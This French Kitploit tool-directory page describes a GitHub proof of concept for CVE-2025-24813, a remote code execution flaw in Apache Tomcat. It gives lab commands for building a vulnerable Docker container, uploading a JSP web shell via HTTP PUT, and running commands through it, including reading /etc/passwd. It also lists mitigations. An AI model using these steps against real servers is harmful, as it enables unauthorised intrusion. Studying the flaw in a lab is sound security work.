Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813 — Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC | Kitploit
Outils/GitHubGitHub/shivshantp/cve-2025-24813
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges UtilesLabs et Pratique
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC

Voir le dépôt
58il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-24813 – Exploit RCE Apache Tomcat PUT JSP

CVE Exploit-Status Platform Language Dockerized License

Ce dépôt contient une preuve de concept (PoC) complète pour CVE-2025-24813, une vulnérabilité d'exécution de code à distance (RCE) dans Apache Tomcat utilisant la méthode HTTP PUT pour déployer un web shell JSP malveillant.

🔥 Cet exploit démontre comment un attaquant peut obtenir une RCE via le téléversement de fichiers et l'exécution d'une charge utile dans des instances Tomcat mal sécurisées.


📁 Structure du projet

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 Étapes d'exploitation

1️⃣ Configuration de l'environnement Docker

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat en cours d'exécution
📸 Docker démarré


2️⃣ Téléversement du shell JSP malveillant

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 Téléversement du JSP


3️⃣ Exécution de l'exploit Python

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 Exécution de l'exploit


4️⃣ Interaction avec le web shell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 Fonctionnalités

  • 🔧 Configuration Docker d'un serveur Apache Tomcat vulnérable
  • 📥 Abus de la méthode PUT pour téléverser et déclencher des web shells JSP
  • 🐍 Script PoC basé sur Python
  • 📸 Guide complet basé sur des captures d'écran
  • 📚 Idéal pour la simulation red team et la formation

🛠️ Comment corriger (Atténuation)

  • 🚫 Désactiver les méthodes PUT/DELETE dans web.xml ou la configuration du serveur
  • ⛓️ Utiliser le security manager ou des contrôles plus stricts du conteneur de servlets
  • 🔐 Appliquer des filtres de téléversement et une validation au niveau des fichiers
  • 🧱 Mettre en place un WAF pour bloquer les requêtes PUT non autorisées
  • ✅ Mettre à niveau vers une version sécurisée et corrigée d'Apache Tomcat

⚠️ Avertissement

Ce projet est uniquement destiné à des fins éducatives et de recherche. Tester, exploiter ou utiliser sans autorisation des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester est illégal et contraire à l'éthique.


👨‍💻 Auteur

Shivshant Patil
Certified Ethical Hacker (CEH v13)
Diplômé en génie informatique (B.Tech)
🔗 LinkedIn
🔗 GitHub


Télécharger l’outil